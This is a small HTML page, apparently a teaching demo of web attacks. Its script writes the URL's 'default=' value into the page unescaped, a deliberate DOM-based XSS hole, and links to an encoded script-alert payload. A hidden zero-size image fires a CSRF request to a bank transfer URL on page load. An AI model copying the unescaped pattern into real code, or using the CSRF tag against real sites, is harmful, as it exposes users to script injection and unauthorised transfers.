<!DOCTYPE html>

<html>


<head>

  <link rel="stylesheet" href="style.css">

  <script src="script.js"></script>

</head>

<script>

    document.write("<form><select>");


    document.write("<option value=1>" +
    decodeURIComponent(document.location.href.substring(document.location.href.indexOf("default=") + 8)) + "</option>");


    document.write("<option value=2> French </option>");


    document.write("</select> </form>");

    document.writeln("<a href='" + document.location.href + "#default=%3Cscript%3Ealert(%27Hi, YOU were the victim of a DOM-based XSS Attack. This Site is very vulnernable, have a nice day!!!%27)%3C/script%3E' target=blank> Click here to see the demo in action</a>");



</script>

<body>

<h1>Hello Koen!</h1>

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="0" height="0" border="0">
</body>


</html>
